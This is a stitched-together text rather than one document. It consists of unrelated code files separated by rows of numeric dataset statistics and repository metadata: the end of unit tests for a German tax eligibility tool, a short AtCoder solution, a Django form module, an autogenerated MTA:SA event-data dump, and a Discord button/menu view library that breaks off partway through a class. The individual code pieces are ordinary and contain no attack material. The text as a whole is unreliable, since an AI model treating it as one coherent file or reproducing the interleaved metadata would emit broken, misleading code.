                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'yes',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'yes',
                        'alimony_eligibility': 'no', }
        with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilitySuccessDisplaySteuerlotseStep(
                endpoint='eligibility',
                stored_data=session_data,
                render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
                    {})
            )
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
    # Declining the cheaper check -> capital-investment note is added.
    def test_if_user_wants_no_cheaper_check_then_set_correct_info(self):
        expected_information = [_('form.eligibility.result-note.capital_investment')]
        session_data = {'marital_status_eligibility': 'single',
                        'user_a_has_elster_account_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'yes',
                        'minimal_investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'yes',
                        'cheaper_check_eligibility': 'no', }
        with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilitySuccessDisplaySteuerlotseStep(
                endpoint='eligibility',
                stored_data=session_data,
                render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
                    {})
            )
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
    # Minimal investment income answered 'yes' -> capital-investment note is added.
    def test_if_user_has_no_minimal_investment_income_then_set_correct_info(self):
        expected_information = [_('form.eligibility.result-note.capital_investment')]
        session_data = {'marital_status_eligibility': 'single',
                        'user_a_has_elster_account_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'yes',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'yes', }
        with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilitySuccessDisplaySteuerlotseStep(
                endpoint='eligibility',
                stored_data=session_data,
                render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
                    {})
            )
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
    # Both conditions hold -> both notes, in registration-then-investment order.
    def test_if_user_b_has_no_elster_account_and_user_wants_no_cheaper_check_then_set_correct_info(self):
        expected_information = [_('form.eligibility.result-note.user_b_elster_account-registration-success'),
                                _('form.eligibility.result-note.capital_investment')]
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'yes',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'yes',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'yes',
                        'minimal_investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'yes',
                        'cheaper_check_eligibility': 'no', }
        with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilitySuccessDisplaySteuerlotseStep(
                endpoint='eligibility',
                stored_data=session_data,
                render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
                    {})
            )
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
    # Registration note plus minimal-investment-income variant of the investment note.
    def test_if_user_b_has_no_elster_account_and_user_has_minimal_investment_income_check_then_set_correct_info(self):
        expected_information = [_('form.eligibility.result-note.user_b_elster_account-registration-success'),
                                _('form.eligibility.result-note.capital_investment')]
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'yes',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'yes',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'yes',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'yes', }
        with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilitySuccessDisplaySteuerlotseStep(
                endpoint='eligibility',
                stored_data=session_data,
                render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
                    {})
            )
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
    # No stored data at all -> no dependent notes.
    def test_if_no_user_b_elster_account_and_no_cheaper_check_then_set_no_info(self):
        expected_information = []
        with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilitySuccessDisplaySteuerlotseStep(
                endpoint='eligibility',
                render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
                    {}))
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
class TestEligibilityMaybeDisplaySteuerlotseStep(unittest.TestCase):
    """Tests for the 'maybe eligible' page: which 'dependent_notes' hints are
    produced from the stored eligibility answers. Here the lazy translator
    '_l' (not '_') is patched to the identity, so notes are raw text ids."""
    @pytest.fixture(autouse=True)
    def attach_fixtures(self, test_request_context, app):
        self.req = test_request_context
        self.app = app
    # Only user B lacks an Elster account -> no note on the maybe page.
    def test_if_user_b_has_no_elster_account_then_set_correct_info(self):
        expected_information = []
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'yes',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'yes',
                        'alimony_eligibility': 'no', }
        with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilityMaybeDisplaySteuerlotseStep(
                endpoint='eligibility',
                stored_data=session_data,
                render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
                    {})
            )
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
    # Both users have Elster accounts -> both-accounts registration note.
    def test_if_both_have_elster_account_then_set_correct_info(self):
        expected_information = ['form.eligibility.result-note.both_elster_account-registration-maybe']
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'yes',
                        'user_b_has_elster_account_eligibility': 'yes',
                        'joint_taxes_eligibility': 'yes',
                        'alimony_eligibility': 'no', }
        with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilityMaybeDisplaySteuerlotseStep(
                endpoint='eligibility',
                stored_data=session_data,
                render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
                    {})
            )
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
    # Declining the cheaper check -> capital-investment note.
    def test_if_user_wants_no_cheaper_check_then_set_correct_info(self):
        expected_information = ['form.eligibility.result-note.capital_investment']
        session_data = {'marital_status_eligibility': 'single',
                        'user_a_has_elster_account_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'yes',
                        'minimal_investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'yes',
                        'cheaper_check_eligibility': 'no', }
        with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilityMaybeDisplaySteuerlotseStep(
                endpoint='eligibility',
                stored_data=session_data,
                render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
                    {})
            )
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
    # Minimal investment income answered 'yes' -> capital-investment note.
    def test_if_user_has_no_minimal_investment_income_then_set_correct_info(self):
        expected_information = ['form.eligibility.result-note.capital_investment']
        session_data = {'marital_status_eligibility': 'single',
                        'user_a_has_elster_account_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'yes',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'yes', }
        with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilityMaybeDisplaySteuerlotseStep(
                endpoint='eligibility',
                stored_data=session_data,
                render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
                    {})
            )
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
    # Both conditions hold -> both notes, registration note first.
    def test_if_both_users_have_elster_account_and_user_wants_no_cheaper_check_then_set_correct_info(self):
        expected_information = ['form.eligibility.result-note.both_elster_account-registration-maybe',
                                'form.eligibility.result-note.capital_investment']
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'yes',
                        'user_b_has_elster_account_eligibility': 'yes',
                        'joint_taxes_eligibility': 'yes',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'yes',
                        'minimal_investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'yes',
                        'cheaper_check_eligibility': 'no', }
        with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilityMaybeDisplaySteuerlotseStep(
                endpoint='eligibility',
                stored_data=session_data,
                render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
                    {})
            )
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
    # Registration note plus minimal-investment-income variant of the investment note.
    def test_if_both_users_have_elster_account_and_user_has_minimal_investment_income_check_then_set_correct_info(self):
        expected_information = ['form.eligibility.result-note.both_elster_account-registration-maybe',
                                'form.eligibility.result-note.capital_investment']
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'yes',
                        'user_b_has_elster_account_eligibility': 'yes',
                        'joint_taxes_eligibility': 'yes',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'yes',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'yes', }
        with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilityMaybeDisplaySteuerlotseStep(
                endpoint='eligibility',
                stored_data=session_data,
                render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
                    {})
            )
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
    # No stored data -> no dependent notes.
    def test_if_no_special_case_then_set_only_deadline_info(self):
        expected_information = []
        with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
            step = EligibilityMaybeDisplaySteuerlotseStep(
                endpoint='eligibility',
                render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
                    {}))
            step.handle()
            self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
| 61.232232
| 185
| 0.675524
| 19,633
| 209,353
| 6.730963
| 0.016044
| 0.053023
| 0.028877
| 0.052971
| 0.934634
| 0.931433
| 0.928051
| 0.925266
| 0.921959
| 0.917797
| 0
| 0.00029
| 0.24195
| 209,353
| 3,418
| 186
| 61.250146
| 0.832407
| 0.000072
| 0
| 0.893668
| 0
| 0
| 0.177886
| 0.13068
| 0
| 0
| 0
| 0
| 0.075705
| 1
| 0.094288
| false
| 0
| 0.005162
| 0
| 0.113902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
04af2b42ae3e6c0bf1206b99acf96634e5fd4226
| 95
|
py
|
Python
|
code/abc124_c_02.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | 3
|
2019-08-16T16:55:48.000Z
|
2021-04-11T10:21:40.000Z
|
code/abc124_c_02.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | null | null | null |
code/abc124_c_02.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | null | null | null |
# Minimum repaints to turn the 0/1 tile string into an alternating pattern.
# Two possible targets: "1010..." ('1' on even indices) or "0101..." ('0' on
# even indices); each mismatching position costs one repaint.
s = input()
even_tiles, odd_tiles = s[::2], s[1::2]
cost_start_one = even_tiles.count("0") + odd_tiles.count("1")
cost_start_zero = even_tiles.count("1") + odd_tiles.count("0")
print(min(cost_start_one, cost_start_zero))
| 47.5
| 85
| 0.505263
| 22
| 95
| 2.181818
| 0.363636
| 0.5
| 0.291667
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 0.010526
| 95
| 2
| 85
| 47.5
| 0.404255
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
04b06f0d814185f95da52e69c66216dbdfd08eb6
| 1,097
|
py
|
Python
|
dzprojects/project/forms.py
|
Aniter-amine/Projects-Posting
|
f7ea6739d9cf179963123ef7a11cbf95f9886d48
|
[
"Apache-2.0"
] | null | null | null |
dzprojects/project/forms.py
|
Aniter-amine/Projects-Posting
|
f7ea6739d9cf179963123ef7a11cbf95f9886d48
|
[
"Apache-2.0"
] | null | null | null |
dzprojects/project/forms.py
|
Aniter-amine/Projects-Posting
|
f7ea6739d9cf179963123ef7a11cbf95f9886d48
|
[
"Apache-2.0"
] | null | null | null |
from django import forms
from .models import Project
# Categories settings
class ProjectForm(forms.ModelForm):
    """ModelForm for creating a Project."""
    class Meta:
        model = Project
        # 'header_image' has no widget override below, so it keeps the
        # model field's default widget.
        fields = ('title', 'body', 'header_image',
                  'website_link', 'repository_link')
        # Bootstrap styling: every overridden widget gets the
        # 'form-control' CSS class.
        widgets = {
            'title': forms.TextInput(attrs={'class': 'form-control'}),
            'body': forms.Textarea(attrs={'class': 'form-control'}),
            'website_link': forms.TextInput(attrs={'class': 'form-control'}),
            'repository_link': forms.TextInput(attrs={'class': 'form-control'}),
        }
class EditForm(forms.ModelForm):
    """ModelForm for editing an existing Project.

    NOTE(review): this Meta is byte-for-byte identical to ProjectForm's;
    consider sharing the definition (e.g. subclassing) if the two forms are
    meant to stay in sync — confirm before refactoring.
    """
    class Meta:
        model = Project
        # 'header_image' keeps its default widget (no override below).
        fields = ('title', 'body', 'header_image',
                  'website_link', 'repository_link')
        # Bootstrap styling via the 'form-control' CSS class.
        widgets = {
            'title': forms.TextInput(attrs={'class': 'form-control'}),
            'body': forms.Textarea(attrs={'class': 'form-control'}),
            'website_link': forms.TextInput(attrs={'class': 'form-control'}),
            'repository_link': forms.TextInput(attrs={'class': 'form-control'}),
        }
| 33.242424
| 80
| 0.577028
| 106
| 1,097
| 5.877358
| 0.264151
| 0.128411
| 0.179775
| 0.269663
| 0.853933
| 0.853933
| 0.853933
| 0.853933
| 0.853933
| 0.853933
| 0
| 0
| 0.257065
| 1,097
| 32
| 81
| 34.28125
| 0.764417
| 0.01732
| 0
| 0.75
| 0
| 0
| 0.282528
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
04b4409aa65f1727db3ee7a14678cdccd86b60d5
| 6,952
|
py
|
Python
|
events/colshape_events.py
|
mtasa-typescript/mtasa-wiki-dump
|
edea1746850fb6c99d6155d1d7891e2cceb33a5c
|
[
"MIT"
] | null | null | null |
events/colshape_events.py
|
mtasa-typescript/mtasa-wiki-dump
|
edea1746850fb6c99d6155d1d7891e2cceb33a5c
|
[
"MIT"
] | 1
|
2021-02-24T21:50:18.000Z
|
2021-02-24T21:50:18.000Z
|
events/colshape_events.py
|
mtasa-typescript/mtasa-wiki-dump
|
edea1746850fb6c99d6155d1d7891e2cceb33a5c
|
[
"MIT"
] | null | null | null |
# Autogenerated file. ANY CHANGES WILL BE OVERWRITTEN
from to_python.core.types import FunctionType, \
FunctionArgument, \
FunctionArgumentValues, \
FunctionReturnTypes, \
FunctionSignature, \
FunctionDoc, \
EventData, \
CompoundEventData
# Autogenerated event-metadata dump for the MTA:SA colshape events.
# Each CompoundEventData pairs the server-side and client-side variants of one
# wiki event; the side that does not exist is left as an empty list.
DUMP_PARTIAL = [
    # onClientColShapeHit — client-side only.
    CompoundEventData(
        server=[
        ],
        client=[
            EventData(
                name='onClientColShapeHit',
                docs=FunctionDoc(
                    description='This event is triggered when a physical element hits a colshape.',
                    arguments={
                        "theElement": """the element that entered the colshape. """,
                        "matchingDimension": """a boolean referring to whether the hit collision shape was in the same dimension as the element. """
                    },
                    result='',
                ),
                arguments=FunctionArgumentValues(
                    arguments=[
                        [
                            FunctionArgument(
                                name='theElement',
                                argument_type=FunctionType(
                                    names=['element'],
                                    is_optional=False,
                                ),
                                default_value=None,
                            )
                        ],
                        [
                            FunctionArgument(
                                name='matchingDimension',
                                argument_type=FunctionType(
                                    names=['bool'],
                                    is_optional=False,
                                ),
                                default_value=None,
                            )
                        ]
                    ],
                    variable_length=False,
                ),
            )
        ],
    ),
    # onClientColShapeLeave — client-side only.
    CompoundEventData(
        server=[
        ],
        client=[
            EventData(
                name='onClientColShapeLeave',
                docs=FunctionDoc(
                    description='This event is triggered when a physical element leaves a colshape.',
                    arguments={
                        "theElement": """the element that left the colshape. """,
                        "matchingDimension": """a boolean referring to whether the collision shape was in the same dimension as the element. """
                    },
                    result='',
                ),
                arguments=FunctionArgumentValues(
                    arguments=[
                        [
                            FunctionArgument(
                                name='theElement',
                                argument_type=FunctionType(
                                    names=['element'],
                                    is_optional=False,
                                ),
                                default_value=None,
                            )
                        ],
                        [
                            FunctionArgument(
                                name='matchingDimension',
                                argument_type=FunctionType(
                                    names=['bool'],
                                    is_optional=False,
                                ),
                                default_value=None,
                            )
                        ]
                    ],
                    variable_length=False,
                ),
            )
        ],
    ),
    # onColShapeHit — server-side only.
    CompoundEventData(
        server=[
            EventData(
                name='onColShapeHit',
                docs=FunctionDoc(
                    description='This event is triggered when a physical element hits a colshape.',
                    arguments={
                        "hitElement": """: the element that entered the colshape. """,
                        "matchingDimension": """: a boolean referring to whether the hit collision shape was in the same dimension as the element. """
                    },
                    result='',
                ),
                arguments=FunctionArgumentValues(
                    arguments=[
                        [
                            FunctionArgument(
                                name='hitElement',
                                argument_type=FunctionType(
                                    names=['element'],
                                    is_optional=False,
                                ),
                                default_value=None,
                            )
                        ],
                        [
                            FunctionArgument(
                                name='matchingDimension',
                                argument_type=FunctionType(
                                    names=['bool'],
                                    is_optional=False,
                                ),
                                default_value=None,
                            )
                        ]
                    ],
                    variable_length=False,
                ),
            )
        ],
        client=[
        ],
    ),
    # onColShapeLeave — server-side only.
    CompoundEventData(
        server=[
            EventData(
                name='onColShapeLeave',
                docs=FunctionDoc(
                    description='This event is triggered when a player or a vehicle leaves a collision shape.',
                    arguments={
                        "leaveElement": """: The element that who exited the col shape. This can be a player or a vehicle. """,
                        "matchingDimension": """: a boolean referring to whether the collision shape was in the same dimension as the element. """
                    },
                    result='',
                ),
                arguments=FunctionArgumentValues(
                    arguments=[
                        [
                            FunctionArgument(
                                name='leaveElement',
                                argument_type=FunctionType(
                                    names=['element'],
                                    is_optional=False,
                                ),
                                default_value=None,
                            )
                        ],
                        [
                            FunctionArgument(
                                name='matchingDimension',
                                argument_type=FunctionType(
                                    names=['bool'],
                                    is_optional=False,
                                ),
                                default_value=None,
                            )
                        ]
                    ],
                    variable_length=False,
                ),
            )
        ],
        client=[
        ],
    )
]
| 37.578378
| 146
| 0.353999
| 358
| 6,952
| 6.790503
| 0.22905
| 0.032908
| 0.07898
| 0.095434
| 0.815302
| 0.776635
| 0.776635
| 0.755245
| 0.755245
| 0.729741
| 0
| 0
| 0.579114
| 6,952
| 184
| 147
| 37.782609
| 0.830827
| 0.007336
| 0
| 0.691011
| 1
| 0
| 0.171329
| 0.003044
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005618
| 0
| 0.005618
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6d22e794a0a44e1a00c2a830d83667517260428b
| 18,857
|
py
|
Python
|
package/btns_menus/Combinations.py
|
Core7-Development/discord_btns_menus
|
7cc62ddaf8cfa17179bf705155c92cd4db6ea59d
|
[
"MIT"
] | 8
|
2022-02-04T10:02:30.000Z
|
2022-03-23T06:09:53.000Z
|
package/btns_menus/Combinations.py
|
Core7-Development/discord_btns_menus
|
7cc62ddaf8cfa17179bf705155c92cd4db6ea59d
|
[
"MIT"
] | null | null | null |
package/btns_menus/Combinations.py
|
Core7-Development/discord_btns_menus
|
7cc62ddaf8cfa17179bf705155c92cd4db6ea59d
|
[
"MIT"
] | 2
|
2022-02-04T17:29:20.000Z
|
2022-03-08T04:59:18.000Z
|
from btns_menus.builds.abc import *
from btns_menus.builds.button_ import SButton, Btn
from btns_menus.builds.menu_ import SDropMenu, Menu
from typing import *
import discord
from discord import ui
class BtnAndDropMenu:
    def __init__(self, author: discord.Member, button1: SButton, menu1: SDropMenu,
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        Responsive view combining one button and one drop menu.

        :param author: Interaction User
        :param button1: takes button type SButton
        :param menu1: takes dropmenu type SDropMenu
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.btn1 = button1
        self.menu1 = menu1
        self.components = [button1, menu1]
        # Components created without an author inherit this view's author.
        for item in self.components:
            if item.author is None:
                item.update(author=self.author)
        # Factory the child widgets use to rebuild this view after an interaction.
        self.root_ = lambda: BtnAndDropMenu(
            self.author, self.btn1, self.menu1, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""
        built = ui.View(timeout=self.timeout)
        for item in self.components:
            if item.hidden:
                continue
            wrapper = Btn if isinstance(item, SButton) else Menu
            built.add_item(wrapper(self.root_, item))
        return built
class Btn2AndDropMenu:
    def __init__(self, author: discord.Member, button1: SButton, button2: SButton, menu1: SDropMenu,
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        Responsive view combining two buttons and one drop menu.

        :param author: Interaction User
        :param button1: takes button type SButton
        :param button2: takes button type SButton
        :param menu1: takes Dropmenu type SDropMenu
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.btn1 = button1
        self.btn2 = button2
        self.menu1 = menu1
        self.components = [button1, button2, menu1]
        # Components created without an author inherit this view's author.
        for item in self.components:
            if item.author is None:
                item.update(author=self.author)
        # Factory the child widgets use to rebuild this view after an interaction.
        self.root_ = lambda: Btn2AndDropMenu(
            self.author, self.btn1, self.btn2, self.menu1, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""
        built = ui.View(timeout=self.timeout)
        for item in self.components:
            if item.hidden:
                continue
            wrapper = Btn if isinstance(item, SButton) else Menu
            built.add_item(wrapper(self.root_, item))
        return built
class Btn3AndDropMenu:
    def __init__(self, author: discord.Member, button1: SButton,
                 button2: SButton, button3: SButton, menu1: SDropMenu,
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        Responsive Buttons and DropMenus

        :param author: Interaction User
        :param button1: takes button type SButton
        :param button2: takes button type SButton
        :param button3: takes button type SButton
        :param menu1: takes dropmenu type SDropMenu
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.btn1 = button1
        self.btn2 = button2
        self.btn3 = button3
        self.menu1 = menu1
        self.components = [self.btn1, self.btn2, self.btn3, self.menu1]
        # Components created without an author inherit this view's author.
        for component_ in self.components:
            if component_.author is None:
                component_.update(author=self.author)
        # Factory the child widgets use to rebuild this view after an interaction.
        self.root_ = lambda: Btn3AndDropMenu(self.author, self.btn1, self.btn2,
                                             self.btn3, self.menu1, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""  # docstring added for consistency with sibling classes
        view_ = ui.View(timeout=self.timeout)
        for component_ in self.components:
            if not component_.hidden:
                if isinstance(component_, SButton):
                    view_.add_item(Btn(self.root_, component_))
                else:
                    view_.add_item(Menu(self.root_, component_))
        return view_
class Btn4AndDropMenu:
    def __init__(self, author: discord.Member, button1: SButton,
                 button2: SButton, button3: SButton, button4: SButton, menu1: SDropMenu,
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        Responsive view combining four buttons and one drop menu.

        :param author: Interaction User
        :param button1: takes button type SButton
        :param button2: takes button type SButton
        :param button3: takes button type SButton
        :param button4: takes button type SButton
        :param menu1: takes dropmenu type SDropMenu
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.btn1 = button1
        self.btn2 = button2
        self.btn3 = button3
        self.btn4 = button4
        self.menu1 = menu1
        self.components = [button1, button2, button3, button4, menu1]
        # Components created without an author inherit this view's author.
        for item in self.components:
            if item.author is None:
                item.update(author=self.author)
        # Factory the child widgets use to rebuild this view after an interaction.
        self.root_ = lambda: Btn4AndDropMenu(self.author, self.btn1, self.btn2,
                                             self.btn3, self.btn4, self.menu1, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""
        built = ui.View(timeout=self.timeout)
        for item in self.components:
            if item.hidden:
                continue
            wrapper = Btn if isinstance(item, SButton) else Menu
            built.add_item(wrapper(self.root_, item))
        return built
class BtnAnd2DropMenu:
    def __init__(self, author: discord.Member, button1: SButton, menu1: SDropMenu, menu2: SDropMenu,
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        Responsive Buttons and DropMenus

        :param author: Interaction User
        :param button1: takes button type SButton
        :param menu1: takes dropmenu type SDropMenu
        :param menu2: takes dropmenu type SDropMenu
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.btn1 = button1
        self.menu1 = menu1
        self.menu2 = menu2
        # Fixed: was `[self.btn1, self.menu1, menu2]` — bare `menu2` is the same
        # object but inconsistent with every sibling class; use the attribute.
        self.components = [self.btn1, self.menu1, self.menu2]
        # Components created without an author inherit this view's author.
        for component_ in self.components:
            if component_.author is None:
                component_.update(author=self.author)
        # Factory the child widgets use to rebuild this view after an interaction.
        self.root_ = lambda: BtnAnd2DropMenu(
            self.author, self.btn1, self.menu1, self.menu2, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""
        view_ = ui.View(timeout=self.timeout)
        for component_ in self.components:
            if not component_.hidden:
                if isinstance(component_, SButton):
                    view_.add_item(Btn(self.root_, component_))
                else:
                    view_.add_item(Menu(self.root_, component_))
        return view_
class Btn2And2DropMenu:
    def __init__(self, author: discord.Member, button1: SButton, button2: SButton, menu1: SDropMenu, menu2: SDropMenu,
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        Responsive view combining two buttons and two drop menus.

        :param author: Interaction User
        :param button1: takes button type SButton
        :param button2: takes button type SButton
        :param menu1: takes dropmenu type SDropMenu
        :param menu2: takes dropmenu type SDropMenu
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.btn1 = button1
        self.btn2 = button2
        self.menu1 = menu1
        self.menu2 = menu2
        self.components = [button1, button2, menu1, menu2]
        # Components created without an author inherit this view's author.
        for item in self.components:
            if item.author is None:
                item.update(author=self.author)
        # Factory the child widgets use to rebuild this view after an interaction.
        self.root_ = lambda: Btn2And2DropMenu(self.author, self.btn1, self.btn2, self.menu1,
                                              self.menu2, timeout=self.timeout)

    def view(self) -> ui.View:
        """:returns: discord.ui.View"""
        built = ui.View(timeout=self.timeout)
        for item in self.components:
            if item.hidden:
                continue
            wrapper = Btn if isinstance(item, SButton) else Menu
            built.add_item(wrapper(self.root_, item))
        return built
class Btn3And2DropMenu:
    def __init__(self, author: discord.Member, button1: SButton, button2: SButton, button3: SButton,
                 menu1: SDropMenu, menu2: SDropMenu,
                 *, timeout: Optional[float] = DEFAULT_TIMEOUT):
        """
        Responsive view combining three buttons and two drop menus.

        :param author: Interaction User
        :param button1: takes button type SButton
        :param button2: takes button type SButton
        :param button3: takes button type SButton
        :param menu1: takes dropmenu type SDropMenu
        :param menu2: takes dropmenu type SDropMenu
        :param timeout: Interaction Timeout
        :returns: view: discord.ui.View
        """
        self.author = author
        self.timeout = timeout
        self.btn1 = button1
        self.btn2 = button2
        self.btn3 = button3
        self.menu1 = menu1
        self.menu2 = menu2
